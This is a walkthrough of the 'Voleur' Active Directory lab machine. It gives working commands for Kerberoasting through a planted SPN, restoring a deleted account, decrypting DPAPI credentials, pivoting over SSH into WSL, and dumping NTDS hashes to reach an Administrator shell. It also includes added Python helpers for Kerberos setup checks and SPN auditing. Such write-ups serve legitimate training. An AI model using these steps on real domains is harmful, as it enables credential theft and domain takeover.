🕵️ Voleur

Machine: Voleur
Difficulty: Medium
Theme: Kerberos-only AD environment → SMB share enumeration → encrypted Office document cracking → service account discovery → WriteSPN Kerberoasting → WinRM foothold → deleted AD object restore → DPAPI credential recovery → WSL SSH pivot → offline NTDS extraction → Administrator shell


🎯 Summary

Voleur is a Windows Active Directory machine where the main challenge is recognizing that NTLM is disabled and adapting the entire workflow to Kerberos.

Initial enumeration identifies a domain controller exposing Kerberos, LDAP, SMB, WinRM, ADWS, and an unusual SSH service on port 2222. Standard username/password authentication attempts over SMB and LDAP fail with STATUS_NOT_SUPPORTED because NTLM is disabled. After configuring /etc/hosts, /etc/krb5.conf, and syncing time with the DC, Kerberos authentication works.

Using the provided low-privileged account, SMB share enumeration reveals a readable IT share. Spidering the share finds an encrypted access-review spreadsheet. The spreadsheet is downloaded with NetExec using Kerberos cache authentication, then cracked offline with office2john and John. The document exposes service account credentials and a note about a deleted user account.

The svc_ldap service account is valid and BloodHound shows it has WriteSPN over svc_winrm, allowing targeted Kerberoasting. Because NTLM is disabled, both the SPN modification and Kerberoasting are performed using Kerberos-aware tooling. The cracked svc_winrm credential gives a Kerberos Evil-WinRM shell and the user flag.

BloodHound also shows that svc_ldap is a member of a restore-related group. From the svc_winrm shell, RunasCs.exe is used to execute PowerShell as svc_ldap, enumerate deleted AD objects, and restore the deleted todd.wolfe account. Todd’s reset password from the spreadsheet then works for Kerberos authentication.

As Todd, SMB access reveals an archived user profile under the IT share. The archived profile contains DPAPI credential blobs and masterkey material. Using Todd’s SID and password, the DPAPI masterkey is decrypted offline, then used to decrypt a saved Windows Credential Manager blob. This reveals credentials for jeremy.combs.

Jeremy has WinRM access and can read the third-line support folder. That folder contains an SSH private key and a note explaining that WSL was partially configured for backup tooling. The SSH key works against port 2222 as svc_backup, landing in an Ubuntu/WSL environment. svc_backup has passwordless sudo, and the WSL filesystem can access Windows-mounted backup directories that were denied from Windows.

The backup directory contains ntds.dit, SYSTEM, and SECURITY. These are copied back to the attacker machine and processed offline with secretsdump. The Administrator NT hash is recovered. Since NTLM is disabled, the hash is used to request a Kerberos TGT, which is then used with Evil-WinRM to obtain an Administrator shell and read the root flag.


1. Enumeration

Initial scanning identified a Windows Active Directory domain controller.

Full TCP scan:

sudo nmap -p- --min-rate=5000 -T4 -vv -oA nmap/voleur_portscan [TARGET_IP]

Targeted service scan:

sudo nmap -sC -sV -vv -oA nmap/voleur [TARGET_IP]

Important services included:

53/tcp     domain
88/tcp     kerberos-sec
135/tcp    msrpc
139/tcp    netbios-ssn
389/tcp    ldap
445/tcp    microsoft-ds
464/tcp    kpasswd5
593/tcp    http-rpc-epmap
636/tcp    ldapssl
2222/tcp   ssh
3268/tcp   globalcatLDAP
3269/tcp   globalcatLDAPssl
5985/tcp   winrm
9389/tcp   adws

The host behaved like a domain controller:

Domain: voleur.htb
Host:   DC
FQDN:   dc.voleur.htb

The hostnames were added to /etc/hosts:

echo "[TARGET_IP] dc.voleur.htb voleur.htb dc" | sudo tee -a /etc/hosts

Nmap also showed a large clock skew, which mattered later because Kerberos requires time synchronization.


2. NTLM Disabled and Kerberos Setup

Initial NetExec authentication attempts failed:

nxc smb voleur.htb -u '[USER]' -p '[PASS]'
nxc ldap voleur.htb -u '[USER]' -p '[PASS]'

Failure pattern:

NTLM:False
STATUS_NOT_SUPPORTED

This was the key early lesson: the credentials were not necessarily wrong; the authentication method was wrong.

A minimal Kerberos config was created:

[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
 
[realms]
    VOLEUR.HTB = {
        kdc = dc.voleur.htb
        admin_server = dc.voleur.htb
        default_domain = voleur.htb
    }
 
[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB

The VM time was synchronized with the DC:

sudo ntpdate [TARGET_IP]

A Kerberos TGT was requested:

impacket-getTGT voleur.htb/[USER]:'[PASSWORD]' -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath [USER].ccache)"
klist

Expected output:

Default principal: [USER]@VOLEUR.HTB
krbtgt/VOLEUR.HTB@VOLEUR.HTB

Important gotcha:

Use the DC FQDN for Kerberos-aware tooling. Avoid targeting only the domain name or the IP unless the tool specifically supports it.


3. RustHound-CE / BloodHound Collection

After fixing the Kerberos/domain confusion, RustHound-CE worked with the initial user:

rusthound-ce \
  --domain voleur.htb \
  -u '[USER]' \
  -p '[PASSWORD]' \
  -z

The first mistake was using the DC FQDN as the domain. The correct separation was:

Domain: voleur.htb
DC:     dc.voleur.htb
Realm:  VOLEUR.HTB

The generated RustHound zip was imported into BloodHound.

At this early stage, BloodHound did not immediately give the full path. SMB file enumeration was the more useful next step.
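To make the Kerberos-only preflight from sections 2 and 3 repeatable, here is an added Python example (it is not part of the original writeup): it recognises the NTLM:False / STATUS_NOT_SUPPORTED pattern in NetExec output, keeps domain, DC FQDN and realm apart (the confusion noted above), renders the same minimal krb5.conf and /etc/hosts line for any domain/DC pair, flags an nmap clock skew beyond the 5-minute Kerberos default, and checks klist output for the expected principal and TGT. All tool output below is constructed, with the page's placeholders such as [TARGET_IP] kept as-is.

```python
import re

# Markers of the NetExec failure pattern from section 2.
NTLM_DISABLED_MARKERS = ("STATUS_NOT_SUPPORTED", "NTLM:False")
# Kerberos rejects requests whose timestamp is further than this from the KDC
# clock (the MIT/Windows default clockskew is 5 minutes).
KERBEROS_MAX_SKEW_SECONDS = 300


def ntlm_disabled(nxc_output: str) -> bool:
    """True when NetExec output shows the NTLM-disabled pattern, not a bad-password pattern."""
    return any(marker in nxc_output for marker in NTLM_DISABLED_MARKERS)


def dc_inside_domain(domain: str, dc_fqdn: str) -> bool:
    """The DC FQDN must be a host inside the domain; the domain name itself is not a DC."""
    domain, dc = domain.lower().rstrip("."), dc_fqdn.lower().rstrip(".")
    return dc != domain and dc.endswith("." + domain)


def split_kerberos_names(domain: str, dc_fqdn: str) -> dict:
    """Keep apart the three names confused in section 3: domain, DC FQDN and realm."""
    if not dc_inside_domain(domain, dc_fqdn):
        raise ValueError(f"{dc_fqdn!r} is not a host inside domain {domain!r}")
    domain, dc = domain.lower().rstrip("."), dc_fqdn.lower().rstrip(".")
    return {
        "domain": domain,
        "dc_fqdn": dc,
        "dc_short": dc[: -(len(domain) + 1)],  # "dc" for dc.voleur.htb
        "realm": domain.upper(),               # realm names are upper-case
    }


def build_krb5_conf(domain: str, dc_fqdn: str) -> str:
    """Render the minimal /etc/krb5.conf from section 2 for any domain/DC pair."""
    n = split_kerberos_names(domain, dc_fqdn)
    return f"""[libdefaults]
    default_realm = {n['realm']}
    dns_lookup_realm = false
    dns_lookup_kdc = false

[realms]
    {n['realm']} = {{
        kdc = {n['dc_fqdn']}
        admin_server = {n['dc_fqdn']}
        default_domain = {n['domain']}
    }}

[domain_realm]
    .{n['domain']} = {n['realm']}
    {n['domain']} = {n['realm']}
"""


def hosts_line(ip: str, domain: str, dc_fqdn: str) -> str:
    """The /etc/hosts entry: IP, DC FQDN, domain name, short host name."""
    n = split_kerberos_names(domain, dc_fqdn)
    return f"{ip} {n['dc_fqdn']} {n['domain']} {n['dc_short']}"


# nmap reports e.g. "|_clock-skew: 7h59m58s" or "|_clock-skew: mean: -1s, deviation: 0s, median: -1s".
_SKEW_RE = re.compile(r"clock-skew:\s*(?:mean:\s*)?(-?)((?:\d+[dhms])+)")
_UNIT_SECONDS = {"d": 86400, "h": 3600, "m": 60, "s": 1}


def clock_skew_seconds(nmap_output: str):
    """Signed skew in seconds from nmap output, or None when nmap printed no clock-skew line."""
    m = _SKEW_RE.search(nmap_output)
    if not m:
        return None
    total = sum(int(v) * _UNIT_SECONDS[u] for v, u in re.findall(r"(\d+)([dhms])", m.group(2)))
    return -total if m.group(1) else total


def needs_time_sync(nmap_output: str) -> bool:
    """True when the skew is outside the Kerberos tolerance, so ntpdate must run first."""
    skew = clock_skew_seconds(nmap_output)
    return skew is not None and abs(skew) > KERBEROS_MAX_SKEW_SECONDS


def ccache_matches(klist_output: str, user: str, realm: str) -> bool:
    """Guard against the wrong .ccache being active: the principal and a TGT must both be present."""
    realm = realm.upper()
    m = re.search(r"Default principal:\s*(\S+)", klist_output)
    has_tgt = f"krbtgt/{realm}@{realm}" in klist_output
    return bool(m) and m.group(1).lower() == f"{user}@{realm}".lower() and has_tgt


# Constructed sample tool output (not captured from the box; page placeholders kept).
SAMPLE_NXC = (
    "SMB  [TARGET_IP]  445  DC  [*] Windows Server (name:DC) (domain:voleur.htb) (NTLM:False)\n"
    "SMB  [TARGET_IP]  445  DC  [-] voleur.htb\\[USER]:[PASS] STATUS_NOT_SUPPORTED\n"
)
SAMPLE_NMAP = "|_clock-skew: 7h59m58s\n"
SAMPLE_KLIST = (
    "Ticket cache: FILE:/home/kali/voleur/svc_ldap.ccache\n"
    "Default principal: svc_ldap@VOLEUR.HTB\n\n"
    "Valid starting       Expires              Service principal\n"
    "01/01/25 00:00:00    01/01/25 10:00:00    krbtgt/VOLEUR.HTB@VOLEUR.HTB\n"
)
```

Run ntlm_disabled on the first failing nxc line before touching Kerberos, and ccache_matches on klist output each time KRB5CCNAME is re-exported; both checks are cheap and remove the two failure modes the takeaways call out (bad-credential misreads and a stale cache).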


4. SMB Share Enumeration with Kerberos

Kerberos-authenticated SMB share enumeration worked:

nxc smb dc.voleur.htb --use-kcache --shares

Readable shares included:

IPC$      READ
IT        READ
NETLOGON  READ
SYSVOL    READ

The IT share was the main target.

A content search found a password-related hit inside an Excel file:

nxc smb dc.voleur.htb --use-kcache --spider IT --content --pattern "passw"

Interesting file:

IT/First-Line Support/Access_Review.xlsx

The file was downloaded with NetExec:

nxc smb dc.voleur.htb \
  --use-kcache \
  --share IT \
  --get-file 'First-Line Support\\Access_Review.xlsx' Access_Review.xlsx

Important gotcha:

When using --share IT, the remote path is relative to the share. Do not include IT\\ again in the path.


5. Encrypted Office Document Cracking

The downloaded file was confirmed to be encrypted:

file Access_Review.xlsx

Output:

Access_Review.xlsx: CDFV2 Encrypted

The Office hash was extracted:

office2john Access_Review.xlsx > office_hash.txt

The document password was cracked:

john office_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john office_hash.txt --show

After opening the spreadsheet, it revealed:

Users
Service accounts
Permissions
Notes
Deleted user password reset note
Service account credentials

Important findings included:

svc_ldap   : [SVC_LDAP_PASSWORD]
svc_iis    : [SVC_IIS_PASSWORD]
todd.wolfe : [TODD_RESET_PASSWORD]

The spreadsheet also suggested that Todd’s account had been deleted, not merely disabled.


6. Validating svc_ldap

The svc_ldap credential was validated with Kerberos-aware LDAP:

nxc ldap voleur.htb -u 'svc_ldap' -p '[SVC_LDAP_PASSWORD]' -k

Successful result:

[+] voleur.htb\svc_ldap:[SVC_LDAP_PASSWORD]

BloodHound showed two important facts about svc_ldap:

svc_ldap -> WriteSPN -> svc_winrm
svc_ldap -> MemberOf -> Restore_Users

These represented two separate primitives:

WriteSPN      → targeted Kerberoasting of svc_winrm
Restore_Users → deleted-object restoration later

The next useful path was to abuse WriteSPN.


7. WriteSPN Abuse and Targeted Kerberoasting

A TGT was requested for svc_ldap:

impacket-getTGT voleur.htb/svc_ldap:'[SVC_LDAP_PASSWORD]' -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath svc_ldap.ccache)"
klist

The fake SPN was added to svc_winrm using bloodyAD with Kerberos cache authentication:

bloodyAD -H dc.voleur.htb \
  -d voleur.htb \
  -u svc_ldap \
  -k ccache="$(realpath svc_ldap.ccache)" \
  set object svc_winrm servicePrincipalName -v 'http/malicious'

Important gotcha:

NetExec uses --use-kcache, but bloodyAD uses:

-k ccache=<path>

The TGS was requested with Kerberos, not NTLM:

GetUserSPNs.py \
  -k \
  -no-pass \
  -dc-host dc.voleur.htb \
  voleur.htb/svc_ldap \
  -request

The resulting Kerberoast hash was saved to a file and cracked with Hashcat mode 13100:

hashcat -m 13100 svc_winrm.hash /usr/share/wordlists/rockyou.txt
hashcat -m 13100 svc_winrm.hash --show

Recovered:

svc_winrm : [SVC_WINRM_PASSWORD]

The fake SPN was cleaned up. First the current value was verified:

bloodyAD -H dc.voleur.htb \
  -d voleur.htb \
  -u svc_ldap \
  -k ccache="$(realpath svc_ldap.ccache)" \
  get object svc_winrm --attr servicePrincipalName

The planted SPN was removed with the msldap SPN helper:

bloodyAD -H dc.voleur.htb \
  -d voleur.htb \
  -u svc_ldap \
  -k ccache="$(realpath svc_ldap.ccache)" \
  msldap delspn 'CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb' 'http/malicious'

Important gotcha:

remove object in bloodyAD deletes an object. It is not the correct syntax for removing an SPN attribute value.
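To make the cleanup verification above concrete, and to show what the same check looks like from the defender's side, here is an added Python example (not part of the writeup): it parses SPNs into class/host/port/instance, flags SPNs on an account whose host is not a known machine in the domain (http/malicious has exactly that shape), and confirms that a planted value is gone. The attribute: value text it reads is modelled on what bloodyAD's get object prints and is constructed here, as is the svc_iis SPN list; neither is real output from the box.

```python
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class SPN:
    service_class: str
    host: str
    port: Optional[str]
    instance: Optional[str]


def parse_spn(spn: str) -> SPN:
    """Split 'class/host[:port][/instance]' into its parts (AD compares SPNs case-insensitively)."""
    service_class, sep, rest = spn.partition("/")
    if not sep or not service_class or not rest:
        raise ValueError(f"malformed SPN: {spn!r}")
    host_port, _, instance = rest.partition("/")
    host, _, port = host_port.partition(":")
    return SPN(service_class.lower(), host.lower(), port or None, instance or None)


def spns_from_attr_output(text: str) -> List[str]:
    """Collect servicePrincipalName values from 'attribute: value' lines
    (the shape bloodyAD's get object prints; the sample below is constructed)."""
    values = []
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == "serviceprincipalname" and value.strip():
            values.append(value.strip())
    return values


def known_host_names(fqdns: Iterable[str]) -> set:
    """Accept both the FQDN and the short name for every known machine."""
    names = set()
    for fqdn in fqdns:
        fqdn = fqdn.lower().rstrip(".")
        names.add(fqdn)
        names.add(fqdn.split(".", 1)[0])
    return names


def audit_account_spns(account: str, spns: Iterable[str],
                       known_fqdns: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Flag SPNs whose host is not a machine in the domain. An SPN such as http/malicious on a
    service account is exactly what a targeted Kerberoast leaves behind if it is not cleaned up."""
    known = known_host_names(known_fqdns)
    findings = []
    for raw in spns:
        try:
            spn = parse_spn(raw)
        except ValueError as exc:
            findings.append((account, raw, str(exc)))
            continue
        if spn.host not in known:
            findings.append((account, raw, f"host {spn.host!r} is not a known domain host"))
    return findings


def audit_domain(account_spns: Dict[str, List[str]], known_fqdns: Iterable[str]):
    """Run the audit over every account that carries SPNs (the Kerberoastable ones)."""
    findings = []
    for account, spns in account_spns.items():
        findings.extend(audit_account_spns(account, spns, known_fqdns))
    return findings


def cleanup_verified(spns_after: Iterable[str], planted: str) -> bool:
    """True once the planted SPN no longer appears on the account (case-insensitive)."""
    return planted.lower() not in {s.lower() for s in spns_after}


# Constructed sample: what 'get object svc_winrm --attr servicePrincipalName' could print
# right after the SPN was planted (not real output from the box).
SAMPLE_BLOODYAD_OUTPUT = """
distinguishedName: CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb
servicePrincipalName: http/malicious
"""
SAMPLE_KNOWN_HOSTS = ["dc.voleur.htb"]
SAMPLE_DOMAIN_SPNS = {
    "svc_winrm": spns_from_attr_output(SAMPLE_BLOODYAD_OUTPUT),
    "svc_iis": ["HTTP/dc.voleur.htb", "HTTP/dc"],  # constructed, legitimate-looking
}
```

Feed the `get object ... --attr servicePrincipalName` output from before and after the msldap delspn step into cleanup_verified to confirm the account is back to its original state; the same audit run over all SPN-bearing users is how a defender spots a planted SPN that an operator forgot to remove.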


8. WinRM as svc_winrm

A TGT was requested for svc_winrm using the cracked password:

impacket-getTGT voleur.htb/svc_winrm:'[SVC_WINRM_PASSWORD]' -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath svc_winrm.ccache)"
klist

Evil-WinRM worked in Kerberos realm mode:

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

Verification:

whoami
hostname
whoami /groups

The user flag was recovered from:

C:\Users\svc_winrm\Desktop\user.txt

Important gotcha:

Using Evil-WinRM with -u and -p caused unstable behavior because the box did not support NTLM. The reliable method was Kerberos mode with -r.


9. Restoring Deleted Todd Wolfe

BloodHound showed that svc_ldap belonged to a restore-related group. The goal was to restore the deleted todd.wolfe account mentioned in the spreadsheet.

Inside the svc_winrm Evil-WinRM shell, a temporary working directory was created:

mkdir C:\Temp
cd C:\Temp

RunasCs.exe was uploaded:

upload RunasCs.exe

A sanity check confirmed commands could run as svc_ldap:

.\RunasCs.exe svc_ldap '[SVC_LDAP_PASSWORD]' "cmd /c whoami"

Expected output:

voleur\svc_ldap

To avoid quoting problems, an enumeration script was created:

Set-Content C:\Temp\enum_deleted.ps1 @'
Import-Module ActiveDirectory
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects -Properties distinguishedName,objectSid,sAMAccountName -SearchBase 'CN=Deleted Objects,DC=voleur,DC=htb' | Format-List Name,ObjectClass,DistinguishedName,ObjectSid
'@

It was executed as svc_ldap:

.\RunasCs.exe svc_ldap '[SVC_LDAP_PASSWORD]' "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Temp\enum_deleted.ps1"

The deleted object was found:

Name              : Todd Wolfe
ObjectClass       : user
DistinguishedName : CN=Todd Wolfe\0ADEL:[GUID],CN=Deleted Objects,DC=voleur,DC=htb
ObjectSid         : [TODD_SID]

The exact DN was used in a restore script:

Set-Content C:\Temp\restore_todd.ps1 @'
Import-Module ActiveDirectory
Restore-ADObject -Identity 'CN=Todd Wolfe\0ADEL:[GUID],CN=Deleted Objects,DC=voleur,DC=htb'
'@

The restore was executed as svc_ldap:

.\RunasCs.exe svc_ldap '[SVC_LDAP_PASSWORD]' "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Temp\restore_todd.ps1"

No output was normal. The deleted-object enumeration was run again, and Todd no longer appeared.

From Kali, Todd’s reset password was validated:

impacket-getTGT voleur.htb/todd.wolfe:'[TODD_PASSWORD]' -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath todd.wolfe.ccache)"
klist

This confirmed the restored account was usable.


10. Todd SMB Access and Archived Profile Discovery

Todd’s SMB access was checked:

nxc smb dc.voleur.htb --use-kcache --shares

The same IT share was readable, but Todd had access to a deeper archived user area.

Spidering revealed:

IT/Second-Line Support/Archived Users/todd.wolfe/

The most important paths were:

AppData/Roaming/Microsoft/Credentials/[CREDENTIAL_BLOB]
AppData/Roaming/Microsoft/Protect/[TODD_SID]/[MASTERKEY_GUID]
AppData/Roaming/Microsoft/Protect/[TODD_SID]/Preferred
AppData/Roaming/Microsoft/Protect/[TODD_SID]/BK-VOLEUR

This indicated a DPAPI path.

Important conceptual relationship:

Credential blob
  encrypted by DPAPI masterkey
 
DPAPI masterkey
  decrypted using Todd SID + Todd password
 
Decrypted masterkey
  decrypts the credential blob

The Roaming credential blob was prioritized because it paired naturally with the Roaming Protect\<SID> directory.
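Added example, not from the writeup, that makes the pairing above mechanical: a Python triage helper that reads which masterkey GUID a Credential Manager blob references, checks whether that masterkey file exists in the Protect\<SID> directory, and compares it with the Preferred file, so the right masterkey is fetched before any decryption and the "wrong masterkey or wrong blob" failure is diagnosed up front. The header layout it parses is an assumption stated here rather than something the page documents: the Credential file and DPAPI blob structures as implemented in Impacket's dpapi.py, and Preferred as a 16-byte GUID plus an 8-byte FILETIME. Every artifact below is a constructed byte string, not one of Todd's real files.

```python
import struct
import uuid
from datetime import datetime, timedelta, timezone
from typing import Iterable, Optional, Tuple

# Well-known GUID of the Windows DPAPI provider, present in every DPAPI blob header.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_preferred(data: bytes) -> Tuple[str, datetime]:
    """Protect\\<SID>\\Preferred (assumed layout): the current masterkey GUID in Windows GUID
    byte order, followed by a FILETIME saying when that masterkey expires."""
    if len(data) < 24:
        raise ValueError("Preferred file is shorter than 24 bytes")
    guid = uuid.UUID(bytes_le=data[:16])            # bytes_le == Windows GUID struct order
    (filetime,) = struct.unpack_from("<Q", data, 16)
    expires = _FILETIME_EPOCH + timedelta(microseconds=filetime // 10)
    return str(guid), expires


def masterkey_guid_from_credential(data: bytes) -> str:
    """Masterkey GUID referenced by a Credentials\\<blob> file (assumed layout, as in Impacket):
    3 x uint32 file header, then the DPAPI blob: version, provider GUID, masterkey version,
    masterkey GUID, flags, ... Only the GUID is needed to know which masterkey to fetch."""
    _version, size, _unknown = struct.unpack_from("<III", data, 0)
    blob = data[12:12 + size]
    if len(blob) < 40:
        raise ValueError("credential blob too short to hold a masterkey GUID")
    provider = uuid.UUID(bytes_le=blob[4:20])
    if provider != DPAPI_PROVIDER_GUID:
        raise ValueError(f"unexpected provider GUID {provider}; not a DPAPI blob?")
    return str(uuid.UUID(bytes_le=blob[24:40]))


def pick_masterkey(credential_blob: bytes, protect_dir_files: Iterable[str],
                   preferred: Optional[bytes] = None) -> Tuple[str, bool, bool]:
    """Return (masterkey GUID the blob needs, is it the Preferred one, is its file present).
    A missing file means the blob was protected under a masterkey that is not in this
    Protect\\<SID> directory, so no password/SID combination will decrypt it from here."""
    needed = masterkey_guid_from_credential(credential_blob)
    found = needed in {name.lower() for name in protect_dir_files}
    is_preferred = preferred is not None and parse_preferred(preferred)[0] == needed
    return needed, is_preferred, found


# --- constructed sample artifacts (not the real files from the box) ---
def _credential_file(masterkey_guid: uuid.UUID) -> bytes:
    blob = (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<I", 1) + masterkey_guid.bytes_le
            + struct.pack("<II", 0, 0))             # flags, description length
    return struct.pack("<III", 1, len(blob), 0) + blob


MK_CURRENT = uuid.UUID("11111111-2222-3333-4444-555555555555")
MK_OLD = uuid.UUID("aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee")
SAMPLE_PROTECT_DIR = [str(MK_CURRENT), str(MK_OLD), "Preferred", "BK-VOLEUR"]
# FILETIME 116444736000000000 is 1970-01-01T00:00:00Z, a convenient known value.
SAMPLE_PREFERRED = MK_CURRENT.bytes_le + struct.pack("<Q", 116444736000000000)
SAMPLE_CREDENTIAL = _credential_file(MK_CURRENT)
SAMPLE_STALE_CREDENTIAL = _credential_file(uuid.UUID("99999999-9999-9999-9999-999999999999"))

if __name__ == "__main__":
    guid, is_pref, found = pick_masterkey(SAMPLE_CREDENTIAL, SAMPLE_PROTECT_DIR, SAMPLE_PREFERRED)
    print(f"blob needs masterkey {guid} (preferred={is_pref}, file present={found})")
    print("Preferred expires:", parse_preferred(SAMPLE_PREFERRED)[1].isoformat())
```

Against a real archive, read the blob with open(path, "rb").read() and pass the directory listing of Protect\<SID>; the GUID this returns is the file name to hand to impacket-dpapi masterkey, which removes the guesswork when a profile holds several masterkeys.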


11. DPAPI Credential Recovery

The credential blob and masterkey were downloaded:

nxc smb dc.voleur.htb \
  --use-kcache \
  --share IT \
  --get-file 'Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/[CREDENTIAL_BLOB]' [CREDENTIAL_BLOB]
 
nxc smb dc.voleur.htb \
  --use-kcache \
  --share IT \
  --get-file 'Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/[TODD_SID]/[MASTERKEY_GUID]' [MASTERKEY_GUID]

The masterkey was decrypted offline:

impacket-dpapi masterkey \
  -file [MASTERKEY_GUID] \
  -sid [TODD_SID] \
  -password '[TODD_PASSWORD]'

Successful output included:

Decrypted key with User Key
Decrypted key: 0x[DPAPI_MASTERKEY]

The credential blob was decrypted:

impacket-dpapi credential \
  -file [CREDENTIAL_BLOB] \
  -key 0x[DPAPI_MASTERKEY]

Recovered credential:

Type     : CRED_TYPE_DOMAIN_PASSWORD
Target   : Domain:target=Jezzas_Account
Username : jeremy.combs
Password : [JEREMY_PASSWORD]

Important gotcha:

The Target field was only a saved label. The actionable credential was the Username and password.


12. WinRM as Jeremy Combs

Jeremy’s credentials were validated:

impacket-getTGT voleur.htb/jeremy.combs:'[JEREMY_PASSWORD]' -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath jeremy.combs.ccache)"
klist

Evil-WinRM worked with Kerberos:

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

Jeremy had access to the third-line support folder:

cd C:\IT\Third-Line Support
dir

Interesting files:

id_rsa
Note.txt.txt
Backups\

The note explained:

Windows Backup was problematic.
WSL had been partially configured for Linux backup tools.

The SSH private key was downloaded:

download id_rsa

The Backups folder was denied from Jeremy’s Windows session, but the note and port 2222 suggested trying the WSL/SSH side.


13. SSH to WSL as svc_backup

The key was prepared locally:

chmod 600 id_rsa
file id_rsa

SSH was attempted against port 2222:

ssh -i id_rsa svc_backup@dc.voleur.htb -p 2222

This landed in Ubuntu on WSL:

Welcome to Ubuntu 20.04 LTS
GNU/Linux ... Microsoft x86_64

The user was confirmed:

whoami

Output:

svc_backup

sudo -l showed full passwordless sudo:

(ALL : ALL) ALL
(ALL) NOPASSWD: ALL

Important distinction:

Root in WSL is not automatically Windows Administrator. However, WSL can still access mounted Windows paths under /mnt/c, which made the backup folder accessible.


14. Accessing Backup Files Through WSL

The Windows backup directory was inspected from WSL:

ls -la /mnt/c/IT/'Third-Line Support'/Backups
find /mnt/c/IT/'Third-Line Support'/Backups -maxdepth 3 -type f -ls

Important files:

/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit
/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM
/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY

This was an offline domain credential extraction path.

The files were copied to Kali by running scp from the Kali side:

scp -i id_rsa -P 2222 "svc_backup@dc.voleur.htb:/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit" ./ntds.dit
 
scp -i id_rsa -P 2222 "svc_backup@dc.voleur.htb:/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM" ./SYSTEM
 
scp -i id_rsa -P 2222 "svc_backup@dc.voleur.htb:/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY" ./SECURITY

Important gotcha:

Run scp from Kali, not from inside the WSL SSH session. Also quote remote paths because they contain spaces.

Local verification:

ls -lh ntds.dit SYSTEM SECURITY
file ntds.dit SYSTEM SECURITY

Expected:

ntds.dit: Extensible storage engine DataBase
SYSTEM:   MS Windows registry file
SECURITY: MS Windows registry file

15. Offline NTDS Extraction

The AD database and registry hives were processed offline:

impacket-secretsdump \
  -ntds ntds.dit \
  -system SYSTEM \
  -security SECURITY \
  LOCAL

This dumped domain NT hashes and Kerberos keys, including the Administrator account.

Important finding:

Administrator : [ADMIN_NT_HASH]

Since NTLM was disabled on the target, the Administrator hash was not used with classic pass-the-hash WinRM. Instead, it was used to request a Kerberos TGT.


16. Administrator Shell

A TGT was requested using the Administrator NT hash:

impacket-getTGT voleur.htb/administrator \
  -hashes :[ADMIN_NT_HASH] \
  -dc-ip [TARGET_IP]

The cache was exported:

export KRB5CCNAME="$(realpath administrator.ccache)"
klist

Expected:

Default principal: administrator@VOLEUR.HTB
krbtgt/VOLEUR.HTB@VOLEUR.HTB

Evil-WinRM was used with Kerberos realm mode:

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

Administrator access was confirmed:

whoami
hostname
whoami /groups

The root flag was read from:

C:\Users\Administrator\Desktop\root.txt

A cleanup script in the Administrator profile showed that Todd’s account was intentionally deleted/reset as part of the machine behavior:

get-aduser -identity todd.wolfe
if ($? -eq $true) {
    remove-aduser -identity todd.wolfe -confirm:$false
}

This confirmed that restoring Todd was part of the intended path.


🔗 Condensed Attack Chain

Full TCP scan
  ↓
Domain controller identified
  ↓
NTLM disabled discovered through NetExec failures
  ↓
/etc/hosts, krb5.conf, and time sync configured
  ↓
Kerberos TGT requested for initial user
  ↓
Kerberos SMB share enumeration
  ↓
Readable IT share found
  ↓
Access_Review.xlsx found via SMB spider/content search
  ↓
Spreadsheet downloaded with NetExec --use-kcache
  ↓
Office document password cracked
  ↓
Spreadsheet reveals svc_ldap, service-account notes, and deleted Todd password
  ↓
svc_ldap validated with Kerberos LDAP
  ↓
BloodHound shows svc_ldap WriteSPN over svc_winrm
  ↓
Fake SPN added to svc_winrm
  ↓
Kerberoast TGS requested with Kerberos
  ↓
svc_winrm hash cracked
  ↓
Fake SPN cleaned up
  ↓
TGT requested for svc_winrm
  ↓
Evil-WinRM Kerberos shell as svc_winrm
  ↓
user.txt recovered
  ↓
RunasCs uploaded
  ↓
PowerShell executed as svc_ldap
  ↓
Deleted Todd Wolfe object enumerated
  ↓
Todd restored with Restore-ADObject
  ↓
Todd TGT requested using spreadsheet password
  ↓
Todd SMB access reveals archived profile
  ↓
DPAPI Credential and Protect files downloaded
  ↓
Todd SID + Todd password decrypt DPAPI masterkey
  ↓
DPAPI credential blob decrypted
  ↓
jeremy.combs credential recovered
  ↓
Kerberos WinRM as jeremy.combs
  ↓
Third-Line Support folder accessed
  ↓
id_rsa and WSL backup note found
  ↓
SSH to port 2222 as svc_backup
  ↓
WSL sudo access confirmed
  ↓
Windows backup files accessed under /mnt/c
  ↓
ntds.dit, SYSTEM, SECURITY copied to Kali
  ↓
secretsdump extracts domain hashes offline
  ↓
Administrator hash used to request Kerberos TGT
  ↓
Evil-WinRM as Administrator
  ↓
root.txt recovered

🧠 Key Takeaways

NTLM-disabled environments require a mindset shift. Standard -u/-p authentication may fail even when credentials are valid.

